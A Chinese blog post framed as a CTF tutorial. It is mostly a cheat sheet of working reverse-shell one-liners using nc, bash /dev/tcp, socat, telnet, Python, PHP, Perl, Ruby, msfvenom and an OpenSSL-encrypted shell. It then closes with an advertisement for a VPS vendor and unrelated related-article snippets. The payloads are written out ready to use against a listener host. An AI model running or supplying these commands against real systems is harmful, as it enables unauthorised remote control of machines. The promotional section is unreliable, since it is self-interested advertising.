反弹shell 纯干货版 --D--K--盾

news2024/11/20 12:44:53

本文主要讲解我已知的CTF中对VPS的利用的教程模块,所以本篇文章将会持续更新并且有改动
解密base64会解锁新大陆:

REvnm77lrpjmlrnnvqTvvJo3MjcwNzcwNTU=

弹shell

弹shell有很多种类

NC
nc ip port -e /bin/sh
nc -e /bin/sh ip port         //这种版本过老,一般都是上面的版本已经兼容了下面的版本了,所以上面的命令比较妥当

在这里插入图片描述

bash重定向
bash -i >& /dev/tcp/ip:port 0>&1

bash -c "bash -i >& /dev/tcp/ip/port 0>&1"

在这里插入图片描述

在这里插入图片描述

socat

也是学到了一种新的监听方法

链接
socat tcp-connect:ip:port exec:'bash -li',pty,stderr,setsid,sigint,sane
监听
socat TCP-LISTEN:port -

在这里插入图片描述

Telnet
telnet ip port  0<a | /bin/bash 1>a

在这里插入图片描述

然后监听但是由于我的vps并没有开启这样的端口所以刚链接就断开了
在这里插入图片描述

还有一种是监听两个端口但是这样子我们得开两个VPS应用
在这里插入图片描述
我原先以为可以一次性监听两个端口但是不然,而是分先后顺序
在这里插入图片描述
在这里插入图片描述

telnet ip1 port1 | /bin/bash | telnet ip2 port2
ip1可以和ip2相等,但是端口不能,最后的结果就是我在ip1的vps上进行了命令执行,在ip2看到了回显
也就是相当于自己有个鸡用来进行一些单vps被限制的反弹

EXP反弹

而这类反弹就得看有没有相应的环境了

python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

这里的主要链接功能是socket来完成的,而重定向外带是ossubprocess,细心的小伙伴发现了这个是不是和ssti注入的反弹差不多呢,没错,所以其实实际上的EXP是需要我们根据环境来进行改变的
在这里插入图片描述

PHP
php -r '$sock=fsockopen("ip",port);exec("/bin/sh -i <&3 >&3 2>&3");'

在这里插入图片描述

Perl
perl -e 'use Socket;$i="ip";$p=port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

在这里插入图片描述

Ruby
ruby -rsocket -e 'c=TCPSocket.new("ip","port");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

在这里插入图片描述

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("ip","port");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

在这里插入图片描述
看着这么多命令是不是已经眼花缭乱了,那么这里推荐一个工具

msfvenom使用
msfvenom -l payloads | grep 'cmd/unix/reverse'

看命令目录
在这里插入图片描述

msfvenom -p cmd/unix/reverse_python LHOST=ip LPORT=port -f raw
得到相应命令

在这里插入图片描述
得到命令之后自己运行即可
在这里插入图片描述

终端衔接

不知道大家发现没有我们弹shell,都是那种空白页,并没有显示root,而且还特别不稳定,如果弹shell的时候没有及时断开,那么靶场环境可以就得重开了

python -c "import pty;pty.spawn('/bin/bash')"

这个命令可以模拟终端让我们更好的执行命令
在这里插入图片描述

OpenSSL

用来反弹加密shell,而加密的shell是由我们的RSA来进行加密的

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes

生成加密证书
自己一定要填相应信息即使是虚假的
我当时为了省事,直接一直按空格,然后并不能成功反弹
在这里插入图片描述
监听端口

openssl s_server -quiet -key key.pem -cert cert.pem -port 4444

反弹shell

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect ip:port > /tmp/s; rm /tmp/s

在这里插入图片描述

在这里插入图片描述

引言

那么看到这里了,你是不是会觉得vps在某些特殊环节特别是生活中特别实用呢
那么为了一台好的vps能够在美丽的性能同时还能有同样美丽的价格,这是相当难得的,而我在不经意之间发现了一个厂商,没错,他的名字叫做DK盾

DK盾更加人性化,他的vps是按需上的,你需要什么,他就会去准备什么,尽量在你的接受时间内完成,并且价格也是相当美丽,基本就是行业断层级别的碾压!!
售后服务这是更不用说的,如果不好,那么全权不能称为是人性化,DK师傅(产商经营者)为了我这种小白是专门建了一个官方交流群,其中会不定时送vps以及抽奖,红包问答等等,实在解决不了问题还可私聊教学

在这里插入图片描述
在这里插入图片描述
其中也是并无黑幕,可以看到我也是中了一台并且租了一台传家宝还有台是与官方进行CTFer赞助计划得到的vps

你想有的相应服务都有CDN vps定制  物理机等等

DK官网

若非常感兴趣者可以私聊vps相关问题,
一对一教学,教你弹

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1866906.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

从中序与后序遍历序列构造二叉树-二叉树题型

106. 从中序与后序遍历序列构造二叉树 - 力扣&#xff08;LeetCode&#xff09; right要再left前面 如下如&#xff0c;后序为第一行&#xff0c;最后一个是根&#xff1b; 中序为第二行&#xff0c;中间的为根&#xff1b; 通过后序的最后一个元素从中序中找到根&#xff0…

NodeJs 使用中间件实现日志生成功能

写在前面 今天我们实现一个记录 nodejs 服务请求日志的功能&#xff0c;大概的功能包括请求拦截&#xff0c;将请求的信息作为日志文件的内容写入到 txt 文件中&#xff0c;然后输出到指定的日志到当天日期目录中&#xff0c;从而实现后续查找用户请求信息的功能&#xff0c;下…

三级医院智慧医院信息化规划方案(65页PPT)

方案介绍&#xff1a; 该方案通过信息化手段实现医院信息化全覆盖&#xff0c;优化诊疗流程、提高诊疗效率和准确性&#xff1b;同时实现医疗资源的合理配置和共享&#xff0c;提升医疗服务质量。通过优化患者就医流程、提供便捷的服务和宣传健康知识等方式提高患者满意度。通…

SpringBoot优点达项目实战:获取系统配置接口(三)

SpringBoot优点达项目实战&#xff1a;获取系统配置接口&#xff08;二&#xff09; 文章目录 SpringBoot优点达项目实战&#xff1a;获取系统配置接口&#xff08;二&#xff09;1、查看接口2、查看数据库3、代码实现1、创建实体类SysConfig2、创建返回数据的vo3、创建control…

【Unity】RPG2D龙城纷争(六)关卡编辑器之角色编辑

更新日期&#xff1a;2024年6月26日。 项目源码&#xff1a;第五章发布&#xff08;正式开始游戏逻辑的章节&#xff09; 索引 简介一、角色编辑模式1.将字段限制为只读2.创建角色&#xff08;刷角色&#xff09;3.预览所有角色4.编辑选中角色属性5.移动角色位置6.移除角色 简介…

postgres数据库的流复制

1. 流复制和逻辑复制的差异 逻辑复制和流复制最直观的不同是&#xff0c;逻辑复制支持表级别复制区分点事原理不同 逻辑日志是在wal日志产生的数据库上&#xff0c;由逻辑解析模块对wal日志进行初步的解析&#xff0c;解析结果是ReorderBufferChange&#xff08;理解为HeapTup…

EOS Black延迟高如何处理 EOS Black延迟高这样降低

EOS Black中&#xff0c;玩家可以根据自己的喜好和策略&#xff0c;随心所欲地雕琢人物属性&#xff0c;选择装备属性&#xff0c;搭配千变万化的技能&#xff0c;甚至还可以自定义职业&#xff0c;打造出最适合自己的角色。这种自由度极高的玩法&#xff0c;让玩家能够真正体验…

3D Web轻量引擎HOOPS Web Platform赋能AEC行业数字化,高效渲染与多格式支持!

在建筑、工程和施工&#xff08;AEC&#xff09;行业&#xff0c;数字化转型和高效协作正变得越来越重要。为应对日益复杂的项目需求和不断提升的质量标准&#xff0c;AEC企业需要一种强大的工具来实现高效的3D可视化和数据管理。HOOPS Web Platform作为一款综合性3D开发平台&a…

数字图像分析(第二部分)

文章目录 第8章 图像分割图像分割定义阈值分割依赖像素的阈值选取Otsus方法依赖区域的阈值选取依赖坐标的阈值选取变化阈值法区域生长法分裂合并方法分水岭算法聚类分割算法K-meansAP算法Graph cut第9章 图像特征表达基于全局特征的图像表达直方图GIST基于局部特征的图像表达简…

【护眼科普】台灯怎么选对眼睛好?五大适合学生写作业的台灯推荐

作为一位家长&#xff0c;我深切地领悟到保护孩子眼部健康的至关重要性。随着科技的日新月异&#xff0c;孩子们愈发频繁地接触和使用各类电子设备&#xff0c;如平板电脑、手机和电视&#xff0c;屏幕时间几乎占据了他们日常生活的相当一部分。然而&#xff0c;不容忽视的是&a…

openlayers性能优化——开启图层预加载、减少空白等待时间

使用切片图层时、地图拖拽会有空白图片&#xff0c;为了减少空白等待时间&#xff0c;我们可以开始图层预加载。 const map_top new Map({layers: [new TileLayer({preload:Infinity, //预加载source: new StadiaMaps({layer: "outdoors",}),}),],target: "ma…

【5】apollo编写python节点步骤及实例

在workspace/modules下新建包buildtool create --template component modules/test_one 编译包 buildtool build -p modules/test_two/ 增加自己的proto消息 在刚才自动生成的proto文件里面添加自己定义的消息,记得重新编译. syntax "proto2";package apollo;…

网络编程基础知识拾遗:用大白话解释什么是交换机、路由器、光猫、IP地址和子网掩码、公网和内网IP、端口和域名

二层交换机 在没有二层交换机的环境中&#xff0c;两台电脑或多个电脑之间的通信主要依赖于直连方式或共享介质。假如你和你的舍友都有一台电脑&#xff0c;当你们之间想要进行通信的时候&#xff0c;在没有二层交换机的情况下&#xff0c;可以使用网线&#xff08;为了方便理…

SpringBoot中使用多线程调用异步方法,异步方法有无返回值例子。

快速了解Async注解的用法&#xff0c;包括异步方法无返回值、有返回值&#xff0c;最后总结Async注解失效的几个坑。 在我们的 SpringBoot 应用中&#xff0c;经常会遇到在一个接口中&#xff0c;同时做事情1&#xff0c;事情2&#xff0c;事情3&#xff0c;如果同步执行的话&a…

发电机保护屏产品介绍,组成

发电机保护屏产品介绍&#xff0c;组成 发电机保护屏是用于保护发电机组的电气装置。它根据发电机的类型和实际运行要求&#xff0c;将多种保护装置组合在一起&#xff0c;形成一个保护屏柜。发电机保护测控屏是指把发电机类保护装置集中在安装在一个控制柜里&#xff0c;主要用…

【软件下载】Folx详细安装教程视频-Folx软件最新版下载

根据大数据调查表明Acceleration PRO下载&#xff1a;抽出多达10个流的故障能够显着提高下载速度。根据行业数据显示与iTunes PRO集成&#xff1a;通过将Folx集成到iTunes来下载歌曲和视频&#xff0c;能够在下载后立即自动添加到iTunes库。实际上我们可以这样讲通过代理下载&a…

LabVIEW遇到无法控制国外设备时怎么办

当使用LabVIEW遇到无法控制国外产品的问题时&#xff0c;解决此类问题需要系统化的分析和处理方法。以下是详细的解决思路和具体办法&#xff0c;以及不同方法的分析和比较&#xff0c;包括寻求代理、国外技术支持、国内用过的人请教等内容。 1. 了解产品的通信接口和协议 思路…

小型海外仓布局策略:高效利用有限空间,标准化3F流程

合理高效的仓库空间设计&#xff0c;不只是对大型海外仓很关键。对空间有限的小型海外仓来说或许价值更大。 本身仓储空间就有限&#xff0c;如果还没有科学规划&#xff0c;造成空间浪费&#xff0c;那将直接影响到核心业务的运转。 今天我们就给大家整理了对小型海外仓布局…

制作一个智能体:抖音热点话题文案制作助手

文章目录 第一步&#xff0c;添加助手第二步&#xff0c;选择语聚GPT第三步&#xff0c;填写相关信息第四步&#xff0c;工具中选择抖音(普通号)第五步&#xff0c;选择“查询热门视频数据”第六步&#xff0c;测试总结 这篇文章&#xff0c;我们手把手的演示开发一个智能体&am…

Mysql回表和覆盖索引

一、简述 回表&#xff0c;顾名思义就是回到表中&#xff0c;也就是先通过普通索引扫描出数据所在的行&#xff0c;再通过行主键ID 取出索引中未包含的数据。所以回表的产生也是需要一定条件的&#xff0c;如果一次索引查询就能获得所有的select 记录就不需要回表&#xff0c;…